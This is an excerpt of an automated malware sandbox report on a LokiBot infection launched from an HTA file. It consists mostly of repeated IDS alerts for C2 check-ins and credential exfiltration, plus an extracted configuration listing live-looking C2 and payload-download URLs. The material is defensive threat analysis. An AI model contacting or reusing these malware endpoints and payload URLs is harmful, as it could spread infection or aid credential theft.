2024-11-15T18:14:31.426231+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49761	94.156.177.95	80	TCP
2024-11-15T18:14:32.580658+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49766	94.156.177.95	80	TCP
2024-11-15T18:14:33.648797+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49771	94.156.177.95	80	TCP
2024-11-15T18:14:34.779935+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49776	94.156.177.95	80	TCP
2024-11-15T18:14:35.927180+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49785	94.156.177.95	80	TCP
2024-11-15T18:14:37.042044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49790	94.156.177.95	80	TCP
2024-11-15T18:14:38.155116+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49795	94.156.177.95	80	TCP
2024-11-15T18:14:39.310499+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49801	94.156.177.95	80	TCP
2024-11-15T18:14:40.418721+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49807	94.156.177.95	80	TCP
2024-11-15T18:14:41.540423+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49811	94.156.177.95	80	TCP
2024-11-15T18:14:42.666273+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49815	94.156.177.95	80	TCP
2024-11-15T18:14:43.780827+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49820	94.156.177.95	80	TCP
2024-11-15T18:14:44.948157+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49827	94.156.177.95	80	TCP
2024-11-15T18:14:47.565744+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49839	94.156.177.95	80	TCP
2024-11-15T18:14:48.732748+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49845	94.156.177.95	80	TCP
2024-11-15T18:14:49.866643+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49851	94.156.177.95	80	TCP
2024-11-15T18:14:51.015684+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49856	94.156.177.95	80	TCP
2024-11-15T18:14:52.116189+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49862	94.156.177.95	80	TCP
2024-11-15T18:14:53.231994+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49869	94.156.177.95	80	TCP
2024-11-15T18:14:54.415833+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49875	94.156.177.95	80	TCP
2024-11-15T18:14:55.567481+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49880	94.156.177.95	80	TCP
2024-11-15T18:14:56.697888+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49885	94.156.177.95	80	TCP
2024-11-15T18:14:57.888076+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49889	94.156.177.95	80	TCP
2024-11-15T18:14:59.477956+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49897	94.156.177.95	80	TCP
2024-11-15T18:15:00.622720+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49901	94.156.177.95	80	TCP
2024-11-15T18:15:01.716470+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49905	94.156.177.95	80	TCP
2024-11-15T18:15:02.843351+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49909	94.156.177.95	80	TCP
2024-11-15T18:15:03.944044+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49915	94.156.177.95	80	TCP
2024-11-15T18:15:05.079130+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49920	94.156.177.95	80	TCP
2024-11-15T18:15:06.232263+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49925	94.156.177.95	80	TCP
2024-11-15T18:15:07.371818+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49931	94.156.177.95	80	TCP
2024-11-15T18:15:08.527825+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49935	94.156.177.95	80	TCP
2024-11-15T18:15:09.646081+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49941	94.156.177.95	80	TCP
2024-11-15T18:15:10.738508+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49947	94.156.177.95	80	TCP
2024-11-15T18:15:11.909051+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49952	94.156.177.95	80	TCP
2024-11-15T18:15:13.033207+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49959	94.156.177.95	80	TCP
2024-11-15T18:15:14.143909+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49965	94.156.177.95	80	TCP
2024-11-15T18:15:15.260992+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49971	94.156.177.95	80	TCP
2024-11-15T18:15:16.354360+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49976	94.156.177.95	80	TCP
2024-11-15T18:15:17.488009+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49984	94.156.177.95	80	TCP
2024-11-15T18:15:18.648637+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49991	94.156.177.95	80	TCP
2024-11-15T18:15:19.770914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	49999	94.156.177.95	80	TCP
2024-11-15T18:15:21.183194+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50006	94.156.177.95	80	TCP
2024-11-15T18:15:22.276771+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50014	94.156.177.95	80	TCP
2024-11-15T18:15:23.386905+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50022	94.156.177.95	80	TCP
2024-11-15T18:15:24.486068+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50023	94.156.177.95	80	TCP
2024-11-15T18:15:26.198172+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50024	94.156.177.95	80	TCP
2024-11-15T18:15:27.680897+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50025	94.156.177.95	80	TCP
2024-11-15T18:15:28.793698+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50026	94.156.177.95	80	TCP
2024-11-15T18:15:29.925408+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50027	94.156.177.95	80	TCP
2024-11-15T18:15:31.052611+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50028	94.156.177.95	80	TCP
2024-11-15T18:15:32.214108+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50029	94.156.177.95	80	TCP
2024-11-15T18:15:33.332376+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50030	94.156.177.95	80	TCP
2024-11-15T18:15:34.479837+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50031	94.156.177.95	80	TCP
2024-11-15T18:15:35.618188+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50032	94.156.177.95	80	TCP
2024-11-15T18:15:36.745165+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50033	94.156.177.95	80	TCP
2024-11-15T18:15:37.835646+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50034	94.156.177.95	80	TCP
2024-11-15T18:15:38.930011+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50035	94.156.177.95	80	TCP
2024-11-15T18:15:40.041826+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50036	94.156.177.95	80	TCP
2024-11-15T18:15:41.133212+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50037	94.156.177.95	80	TCP
2024-11-15T18:15:42.287477+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50038	94.156.177.95	80	TCP
2024-11-15T18:15:43.432085+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50039	94.156.177.95	80	TCP
2024-11-15T18:15:44.558614+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50040	94.156.177.95	80	TCP
2024-11-15T18:15:45.645313+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50041	94.156.177.95	80	TCP
2024-11-15T18:15:46.938497+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50042	94.156.177.95	80	TCP
2024-11-15T18:15:48.053000+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50043	94.156.177.95	80	TCP
2024-11-15T18:15:49.198772+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50044	94.156.177.95	80	TCP
2024-11-15T18:15:51.314217+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50045	94.156.177.95	80	TCP
2024-11-15T18:15:52.472929+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50046	94.156.177.95	80	TCP
2024-11-15T18:15:53.951386+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50047	94.156.177.95	80	TCP
2024-11-15T18:15:55.077914+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50048	94.156.177.95	80	TCP
2024-11-15T18:15:56.206763+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50049	94.156.177.95	80	TCP
2024-11-15T18:15:57.353617+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50050	94.156.177.95	80	TCP
2024-11-15T18:15:58.470891+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50051	94.156.177.95	80	TCP
2024-11-15T18:15:59.601399+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50052	94.156.177.95	80	TCP
2024-11-15T18:16:00.728619+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50053	94.156.177.95	80	TCP
2024-11-15T18:16:01.834858+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50054	94.156.177.95	80	TCP
2024-11-15T18:16:03.165663+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50055	94.156.177.95	80	TCP
2024-11-15T18:16:04.337364+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50056	94.156.177.95	80	TCP
2024-11-15T18:16:05.839274+0100	2825766	1	Malware Command and Control Activity Detected	192.168.2.5	50057	94.156.177.95	80	TCP

ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:13:58.852111+0100	2858295	1	A Network Trojan was detected	192.3.243.136	80	192.168.2.5	49748	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:29.780577+0100	2858796	1	A Network Trojan was detected	192.168.2.5	49748	192.3.243.136	80	TCP

ETPRO MALWARE ReverseLoader Payload Request (GET) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-15T18:14:08.904488+0100	2858795	1	A Network Trojan was detected	192.168.2.5	49704	192.3.243.136	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://94.156.177.95/simple/five/fre.php	Avira URL Cloud: Label: malware
Source: http://192.3.243.136/32/seemybestthingswithentirelifetimethingstodomybest.tIF	Avira URL Cloud: Label: malware
Source: 94.156.177.95/simple/five/fre.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.2325175572.00000000065AF000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}

Multi AV Scanner detection for submitted file

Source: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Phishing

Yara detected HtmlPhish44

Source: Yara match

File source: kissmegoodthingwhichgivemebestthignswithgirluaremy.hta, type: SAMPLE

Source: unknown

HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.5:49705 version: TLS 1.2

Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2085425076.0000000007052000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2088188636.0000000007F98000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: aspnet_compiler.pdb source: 31437F.exe.11.dr
Source:	Binary string: $]q8C:\Users\user\AppData\Local\Temp\glmzcldr\glmzcldr.pdb source: powershell.exe, 00000001.00000002.2192931283.00000000053A0000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.2376307590.0000000006750000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.2378358467.0000000006BCB000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 11_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

11_2_00403D74

Software Vulnerabilities

Suspicious execution chain found

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.5:49704 -> 192.3.243.136:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49761 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.5:49748 -> 192.3.243.136:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49801 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49815 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49790 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49815 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49771 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49815 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49766 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49766 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49766 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49827 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49856 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49801 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49815 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49815 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49776 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49776 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49776 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.5:49766 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49815
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49811 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49790 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49820 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49776 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49776 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49801 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49795 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49811 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49811 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49801 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49856 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49856 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49811 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49771 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49820 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49801 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49771 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49875 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49820 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49776
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49889 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49889 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49889 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49827 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49811 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49925 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49925 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49880 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49856 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49807 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49807 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49807 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49807 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49807 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49785 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49905 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49925 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49790 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49880 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49856 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49880 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49925 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49925 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49795
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49925
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49905
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49820 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49790 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49807
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49856
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49771 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49880 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.95:80 -> 192.168.2.5:49801
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49839 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49839 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49839 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49909 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49880 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49771 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49889 -> 94.156.177.95:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49839 -> 94.156.177.95:80
